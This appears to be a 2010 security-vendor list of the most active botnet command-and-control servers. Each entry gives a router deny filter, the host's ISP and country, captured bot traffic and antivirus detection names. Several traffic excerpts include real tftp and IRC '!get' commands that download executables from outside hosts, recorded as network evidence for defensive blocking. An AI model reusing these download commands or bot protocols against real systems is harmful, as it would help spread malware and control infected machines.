Download our list of the most observed botnet command and control server IP addresses.
Most Prolific BotNet Command and Control Servers and Filters
Tue Feb 9 08:47:03 2010
Filter sets: 10 Day Filter Set, 30 Day Filter Set
Priority: 100
TCP Ports: 80
Filter: deny ip host 213.219.245.212 any log ! 438 infects 08/13/09 to 02/08/10 eastweb.ru
ISP: hosting and colocation services
Clients: 438
Country: russian federation
Domain: eastweb.ru
Chatter Example
- Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 87.250.57.232:8138
- Server: GET /index.php?id=txphhhxqqjawgik&scn=0&inf=0&ver=20&cnt=USA...
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | Korgo.9359.B |
| AntiVir | Korgo.X |
| Authentium | Korgo.W |
| Avast | _Korgo-T |
| AVG | Padobot.W |
| BitDefender | Korgo.W |
| CAT-QuickHeal | Korgo.X |
| ClamAV | Korgo.Y |
| DrWeb | Lsabot |
| eSafe | Padobot.gen |
| eTrust-Vet | Korgo.AB |
| Ewido | Dropper.Paradrop.a |
| FileAdvisor | MISSED |
| Fortinet | Korgo.K!worm |
| F-Prot | Korgo.W |
| F-Secure | Padobot.gen |
| Ikarus | Korgo.K |
| Kaspersky | Padobot.gen |
| McAfee | Korgo.ab |
| Microsoft | Korgo.AB |
| NOD32v2 | Korgo.Y |
| Norman | Korgo.Y |
| Panda | Korgo.AY.worm |
| Prevx1 | KORGO.W |
| Rising | Korgo.x |
| Sophos | Korgo-K |
| Sunbelt | MISSED |
| Symantec | Korgo.X |
| TheHacker | Korgo(2).gen.pack |
| TrendMicro | MISSED |
| VBA32 | Padobot.gen |
| VirusBuster | Korgo.AB |
| Webwasher Gateway | Korgo.X |
Priority: 100
TCP Ports: 2081, 9890
Filter: deny ip host 66.252.13.214 any log ! 204 infects 08/14/09 to 11/03/09 louisianadynamics.com
ISP: gigenet
Clients: 204
Country: united states
Domain: louisianadynamics.com
Chatter Example
- Client: USER a
- Client: PASS a
- Server: RETR Win15763.exe
- Client: NICK F-olmgmodqUSER F-olmgmodq 0 0 :F-olmgmodq
- Server: :211.cpe.netcabo.uk NOTICE AUTH :*** Looking up your...
- Client: JOIN ##S## J
- Server: :F-olmgmodq!F-olmgmodq@192.168.1.172 JOIN...
- Client: USERHOST F-olmgmodqJOIN ##S## JUSERHOST F-olmgmodqJOIN ##S##...
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | IRCBot.variant |
| AntiVir | TRCrypt.TPM.Gen |
| Authentium | Heuristic-210!Eldorado |
| Avast | MISSED |
| AVG | RBot.DN |
| BitDefender | MemScan_Backdoor.RBot.XYL |
| CAT-QuickHeal | Black.a |
| ClamAV | Packed-142 |
| DrWeb | Packed.650 |
| eSafe | MISSED |
| eTrust-Vet | ForBot.WP |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Packed.2D18!tr |
| F-Prot | Heuristic-210!Eldorado |
| F-Secure | Kolab.arp |
| Ikarus | Kolab |
| Kaspersky | Kolab.arp |
| McAfee | MISSED |
| Microsoft | Wootbot.gen |
| NOD32v2 | MISSED |
| Norman | Malware.DQWL |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | Undef.blt |
| Sophos | MalGeneric-A |
| Sunbelt | Kolab.arp |
| Symantec | Spybot.Worm |
| TheHacker | Behav-Heuristic-064 |
| TrendMicro | BKDR_SDBOT.FOG |
| VBA32 | Wootbot |
| VirusBuster | Agobot.WPUZ |
| Webwasher Gateway | MISSED |
Priority: 100
TCP Ports: 65520
Filter: deny ip host 88.198.228.238 any log ! 123 infects 12/04/09 to 02/03/10 your-server.de
ISP: hetzner
Clients: 123
Country: germany
Domain: your-server.de
Chatter Example
- Server: PONG :i.
- Client: JOIN &virtu
- Server: NICK yaapulwgUSER k020500 . . :-
- Client: Service Pack 2JOIN &virtu
- Server: :u. PRIVMSG yaapulwg :!get...
- Client: GET /inst.php?id=32&sid=0 HTTP/1.0User-Agent: DownloadHost:...
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | TRFraudPack.aefn |
| Authentium | MISSED |
| Avast | _Malware-gen |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | FraudPack.aefn |
| ClamAV | MISSED |
| DrWeb | Fakealert.8143 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | FraudPack.AEFN!tr |
| F-Prot | MISSED |
| F-Secure | Suspicious_Malware!Gemini |
| Ikarus | FakeAV |
| Kaspersky | FraudPack.aefn |
| McAfee | Suspect-1B!357486DAE775 |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | TrjZlob.KH |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalEncPk-KH |
| Sunbelt | Generic!BT |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | DR.Agent.RFTA |
| Webwasher Gateway | MISSED |
Priority: 97
TCP Ports: 3305
Filter: deny ip host 92.240.234.164 any log ! 94 infects 09/07/09 to 02/08/10 lightstorm.sk
ISP: lightstorm communications s.r.o
Clients: 94
Country: slovakia
Domain: lightstorm.sk
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 211.20.222.150 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 211.20.222.150 get dllhost.exe wins\DLLHOST.EXE
- Client: PASS secretpass
- Client: NICK P|mzlofyw7bUSER hpgbpr6lj * 0 :USA|2K|669
- Server: :hub.2702.net 001 P|mzlofyw7b...
- Client: USERHOST P|mzlofyw7b
- Server: :hub.2702.net 302 P|mzlofyw7b...
- Client: USERHOST P|mzlofyw7bMODE P|mzlofyw7b JOIN #mm RSA
- Client: PRIVMSG #mm...
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | IRCBot.Gen |
| AntiVir | TRATRAPS.Gen |
| Authentium | MISSED |
| Avast | _DCom-F |
| AVG | SHeur2.AOLW |
| BitDefender | Generic.Mydoom.F72197F1 |
| CAT-QuickHeal | Agent.gen |
| ClamAV | MISSED |
| DrWeb | HLLW.Piabot.origin |
| eSafe | MISSED |
| eTrust-Vet | IRCBot.PJ |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Kolabc.gza |
| Ikarus | Exploit.MS06040 |
| Kaspersky | Kolabc.gza |
| McAfee | Spybot.worm!l |
| Microsoft | Exploit_MS06040.gen |
| NOD32v2 | MISSED |
| Norman | Atraps.MQB |
| Panda | TrjCI.A |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalBehav-004 |
| Sunbelt | MISSED |
| Symantec | Spybot.Worm |
| TheHacker | MISSED |
| TrendMicro | SPYBOT.BIM |
| VBA32 | MISSED |
| VirusBuster | RBot.Gen.3 |
| Webwasher Gateway | MISSED |
Priority: 90
TCP Ports: 65520
Filter: deny ip host 218.93.205.30 any log ! 87 infects 09/09/09 to 12/19/09 163data.com.cn
ISP: chinanet jiangsu province network
Clients: 87
Country: china
Domain: 163data.com.cn
Chatter Example
- Server: GET /include/lib.js HTTP/1.0Accept: */*Referer:...
- Server: GET /dspa/hcimages/nonadult/generic_search/main.jpg...
- Client: NICK xmpunysoUSER a020500 . . :-
- Client: Service Pack 2JOIN &virtu
- Server: :u. PRIVMSG xmpunyso :!get http:/pozemle.cn/in/so.txt:u. PRIVMSG...
- Server: GET /in/so.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding:...
- Server: GET /hc3.asp HTTP/1.1Accept: */*Accept-Language:...
- Server: GET /include/lib.js HTTP/1.1Accept: */*Referer:...
- Server: GET /hb.asp HTTP/1.1Accept: */*Referer:...
- Server: GET...
- Server: GET /onexit.asp HTTP/1.1Accept: */*Referer:...
- Server: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET...
- Server: GET /blank.htm HTTP/1.1Accept: */*Referer:...
- Server: GET /hb.asp HTTP/1.1Accept: */*Referer:...
- Server: GET /onexit.asp HTTP/1.1Accept: */*Referer:...
- Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
- Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /?param1={KeyWord:Oakland%20Material%20Handling}...
- Server: + 1) == (name + '=')) { cookieValue =...
- Server: PONG :i.
- Client: JOIN &virtu
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | Momibot |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | Momibot.gen!B |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | TrjCI.A |
| Prevx1 | MISSED |
| Rising | Generic.51F24BA7 |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |
Priority: 59
TCP Ports: 65520
Filter: deny ip host 193.104.94.11 any log ! 57 infects 11/05/09 to 01/31/10 ipaper.com
ISP: block for pi assignments
Clients: 57
Country: united kingdom
Domain: ipaper.com
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 110.14.214.164 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 110.14.214.164 get dllhost.exe wins\DLLHOST.EXE
- Client: NICK muyzvqvrUSER w020500 . . :-
- Client: Service Pack 2JOIN &virtu
- Server: :u. PRIVMSG muyzvqvr :!get...
- Client: GET /erdown.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /erku.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /p1023/2.0/d.bin?pw1022161323 HTTP/1.0Accept: */*User-Agent:...
- Server: GET /portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
- Server: PONG :k.
- Client: JOIN &virtu
- Server: GET /files/logo.gif HTTP/1.0Accept: */*Referer:...
- Server: GET /us/portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
- Server: GET /us/portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | TRClick.VB.dic |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | Trojan-Clicker.VB.dic |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |
Priority: 48
TCP Ports: 65520
Filter: deny ip host 91.212.220.75 any log ! 47 infects 09/11/09 to 10/30/09 -
ISP: group vertical ltd
Clients: 47
Country: russian federation
Domain: -
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 116.126.26.100 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 116.126.26.100 get dllhost.exe wins\DLLHOST.EXE
- Client: NICK xdsexzfyUSER k020500 . . :-
- Client: Service Pack 2JOIN &virtu
- Server: :k. PRIVMSG xdsexzfy :!get http:/gidromash.cn/oc/box.txt
- Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
- Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | DownLoad.47549 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Suspicious_Malware!Gemini |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |
Priority: 35
TCP Ports: 65520
Filter: deny ip host 218.93.201.51 any log ! 34 infects 12/26/09 to 02/08/10 163data.com.cn
ISP: chinanet jiangsu province network
Clients: 34
Country: china
Domain: 163data.com.cn
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 110.12.207.146 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 110.12.207.146 get dllhost.exe wins\DLLHOST.EXE
- Client: NICK qnqaacxfUSER t020500 . . :-
- Client: Service Pack 2JOIN &virtu
- Server: :u. PRIVMSG qnqaacxf :!get...
- Client: GET /inst.php?id=32&sid=0 HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /erdown.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /erku.txt?t=0.6612011 HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
- Server: GET /sv/pm.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /winrar.exe?t=0.5138667 HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /w.txt?t=0.5894679 HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /banner.exe?t=0.774838 HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET / HTTP/1.0Accept: */*Accept-Language: en-usReferer:...
- Server: PONG :i.
- Client: JOIN &virtu
- Server: PONG :i.
- Client: JOIN &virtu
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | TRCrypt.ULPM.Gen |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | VirTool.DelfInject.gen!X.4 |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Suspicious_Malware!Gemini |
| Ikarus | Sopiclick |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | Sopiclick.A |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalGeneric-A |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | SScope.Trojan-Downloader.072 |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |
Priority: 26
TCP Ports: 16667
Filter: deny ip host 66.252.13.212 any log ! 26 infects 08/23/09 to 11/13/09 louisianadynamics.com
ISP: gigenet
Clients: 26
Country: united states
Domain: louisianadynamics.com
Chatter Example
- Client: USER 1
- Server: 331 Password required
- Client: PASS 1
- Server: 230 User logged in.
- Server: RETR Tracker.exe
- Server: 150 Opening BINARY mode data connection
- Server: 221 Goodbye happy r00ting.
- Client: NICK [USA]2K-SP2[00]8493USER ygaci 0 0...
- Server: NICK [USA]2K-SP2[00]6761USER jutcf 0 0...
- Server: :mi67.three.co.lt NOTICE AUTH :*** Looking up your...
- Client: USERHOST [USA]2K-SP2[00]6761
- Client: MODE [USA]2K-SP2[00]6761 -x+iJOIN #l# lamUSERHOST...
- Server: PONG :mi67.three.co.lt
- Client: JOIN #l# lam
- Server: PONG :mi67.three.co.lt
- Client: JOIN #l# lam
- Server: NICK [USA]2K-SP2[00]0046USER etbtll 0 0...
- Server: :mi67.three.co.lt NOTICE AUTH :*** Looking up your hostname...
- Server: :mi67.three.co.lt NOTICE AUTH :*** Couldn't resolve your...
- Server: PONG :mi67.three.co.ltJOIN #l# lam
- Client: USERHOST [USA]2K-SP2[00]0046
- Client: MODE [USA]2K-SP2[00]0046 -x+iJOIN #l# lamUSERHOST...
- Server: PONG :mi67.three.co.ltJOIN #l# lam
- Server: PONG :mi67.three.co.ltJOIN #l# lam
- Server: PONG :mi67.three.co.ltJOIN #l# lam
- Server: PONG :mi67.three.co.ltJOIN #l# lam
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut.B |
| AntiVir | Virut.AX |
| Authentium | Backdoor2.DKQM |
| Avast | _Virtob |
| AVG | Virut |
| BitDefender | Generic.127971 |
| CAT-QuickHeal | Virut.Z |
| ClamAV | Virut-54 |
| DrWeb | HLLW.MyBot |
| eSafe | MISSED |
| eTrust-Vet | Virut.7115 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Virut.AV |
| F-Prot | Backdoor2.DKQM |
| F-Secure | Virut.av |
| Ikarus | VirTool.DelfInject |
| Kaspersky | Virut.av |
| McAfee | Virut.gen.a |
| Microsoft | Virut.AC |
| NOD32v2 | MISSED |
| Norman | Agent.LSMS |
| Panda | Virutas.FG |
| Prevx1 | MISSED |
| Rising | Mnless.akf |
| Sophos | Virut-W |
| Sunbelt | MISSED |
| Symantec | Virut.W |
| TheHacker | Virut.av |
| TrendMicro | PE_VIRUT.AV |
| VBA32 | Virut.2 |
| VirusBuster | Virut.Gen.4 |
| Webwasher Gateway | MISSED |
Priority: 23
TCP Ports: 4545, 8585
Filter: deny ip host 69.42.218.70 any log ! 23 infects 12/01/09 to 12/10/09 likeacyb.org
ISP: awknet communications llc
Clients: 23
Country: united states
Domain: likeacyb.org
Chatter Example
- Client: USER mmsnbl mmsnbl mmsnbl :zrgsgbcjtqojqmvg
- Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname...
- Client: NICK gLMYNsE
- Server: :irc.priv8net.com NOTICE AUTH :*** Couldn't resolve your...
- Client: MODE gLMYNsE +xi
- Client: JOIN ##nerds## USERHOST gLMYNsE
- Server: :gLMYNsE!mmsnbl@28B83DC7.401D014A.D1CD3454.IP JOIN...
- Client: MODE ##NERDS## +smntu
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |
Priority: 22
TCP Ports: 7000
Filter: deny ip host 87.118.98.185 any log ! 22 infects 09/01/09 to 09/04/09 keymachine.de
ISP: keyweb ag ip network
Clients: 22
Country: germany
Domain: keymachine.de
Chatter Example
- Client: USER 1
- Server: 331 Password required
- Client: PASS 1
- Server: 230 User logged in.
- Server: RETR coder.exe
- Server: 150 Opening BINARY mode data connection
- Server: 221 Goodbye happy r00ting.
- Client: NICK USA|00|XP|SP0|0204612USER wxvkwzjqc 0 0...
- Server: :irc.oc256.com NOTICE AUTH :*** Looking up your...
- Server: :irc.oc256.com NOTICE USA|00|XP|SP0|0204612 :*** If you are...
- Server: PONG :DD5EF013
- Client: JOIN ##nzm##
- Client: USERHOST USA|00|XP|SP0|0204612MODE USA|00|XP|SP0|0204612 -x+iJOIN...
- Client: PRIVMSG ##nzm## :\002n\002z\037m\037 (root.p\037l\037g)...
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | Win-Agent.20480.AJY |
| AntiVir | TRDropper.Gen |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | Dropper.Generic.AVFT |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | Poison.767 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | Trojan-Ransom |
| Kaspersky | Trojan-Ransom.SMSer.in |
| McAfee | MISSED |
| Microsoft | VirTool_Injector.gen!Y |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | Rbot.afvq |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |
Priority: 17
TCP Ports: 6900
Filter: deny ip host 78.155.216.238 any log ! 17 infects 09/29/09 to 09/30/09 -
ISP: mostelecom-customer
Clients: 17
Country: russian federation
Domain: -
Chatter Example
- Client: USER 1
- Server: 331 Password required
- Client: PASS 1
- Server: 230 User logged in.
- Server: RETR utilmgr.exe
- Server: 150 Opening BINARY mode data connection
- Server: 221 Goodbye happy r00ting.
- Client: NICK Gleason211USER xaqrn 0 0 :Gleason211
- Server: :fart.bitchassness.shit NOTICE Gleason211 :*** If you are having...
- Server: PONG :4FE4D7D7
- Client: JOIN ##!X4
- Client: USERHOST Gleason211MODE Gleason211 -x+iJOIN ##!X4 USERHOST...
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | IRCBackDoor.SdBot4.NNI |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Kolab.eay |
| Ikarus | Kolab |
| Kaspersky | Kolab.eay |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalGeneric-A |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | KOLAB.DW |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |
Priority: 12
TCP Ports: 6556
Filter: deny ip host 194.109.11.65 any log ! 12 infects 09/06/09 to 12/23/09 xs4all.net
ISP: xs4all ppp _30 router subnets
Clients: 12
Country: netherlands
Domain: xs4all.net
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 74.214.47.11 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 74.214.47.11 get dllhost.exe wins\DLLHOST.EXE
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
- Client: JOIN #9# g3t0u7
- Client: MODE tein +i
- Server: :tein!tein@192.168.1.191 JOIN :#9# g3t0u7
- Server: :mindleak.com MODE #9# g3t0u7 +nt:mindleak.com 353 tein = #9#...
- Client: JOIN #9# g3t0u7
- Server: :tein!tein@192.168.1.191 JOIN :#9# g3t0u7
- Server: :mindleak.com MODE #9# g3t0u7 +nt:mindleak.com 353 tein = #9#...
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | IRCBot.20959 |
| AntiVir | Codbot.BG |
| Authentium | Sdbot.LHJ |
| Avast | _CodBot-P |
| AVG | Generic.GFM |
| BitDefender | Codbot.AG |
| CAT-QuickHeal | MISSED |
| ClamAV | Stration.QR-1 |
| DrWeb | IRC.Moto |
| eSafe | Stration |
| eTrust-Vet | Toxbot.AO |
| Ewido | Codbot.ag |
| FileAdvisor | MISSED |
| Fortinet | SpyBot.ZI!dam |
| F-Prot | Sdbot.LHJ |
| F-Secure | Codbot.bn |
| Ikarus | Codbot.bn |
| Kaspersky | Codbot.bn |
| McAfee | Proxy-FBSR |
| Microsoft | Codbot |
| NOD32v2 | Codbot |
| Norman | Codbot.BG |
| Panda | Codbot.BC.worm |
| Prevx1 | MISSED |
| Rising | Codbot.l |
| Sophos | MalIRCBot-B |
| Sunbelt | MISSED |
| Symantec | Toxbot |
| TheHacker | BackdoorCodbot.ag |
| TrendMicro | TROJ_PROXY.DK |
| VBA32 | Codbot.ag |
| VirusBuster | Codbot.W |
| Webwasher Gateway | Codbot.20959 |
Priority: 10
TCP Ports: 65520
Filter: deny ip host 91.121.221.157 any log ! 10 infects 08/22/09 to 09/05/09 -
ISP: fr-ovh
Clients: 10
Country: france
Domain: -
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 114.203.72.50 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 114.203.72.50 get dllhost.exe wins\DLLHOST.EXE
- Client: NICK lejfnledUSER e020500 . . :_
- Client: Service Pack 2JOIN &virtu
- Server: :l. PRIVMSG lejfnled :!get http:/gidromash.cn/oc/box.txt
- Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
- Server: GET /lib/mr.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Suspicious_Malware!Gemini |
| Ikarus | Hostil |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | Hostil.F |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalEncPk-IF |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |
Priority: 10
TCP Ports: 3305
Filter: deny ip host 200.49.145.197 any log ! 10 infects 09/04/09 to 01/23/10 allytech.com
ISP: allytech s.a
Clients: 10
Country: argentina
Domain: allytech.com
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 173.16.120.174 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 173.16.120.174 get dllhost.exe wins\DLLHOST.EXE
- Client: PASS secretpass
- Client: NICK P|a6xnr2frjUSER a5fik9m7o * 0 :USA|2K|445
- Server: :hub.49011.net 001 P|a6xnr2frj...
- Client: USERHOST P|a6xnr2frj
- Server: :hub.49011.net 302 P|a6xnr2frj...
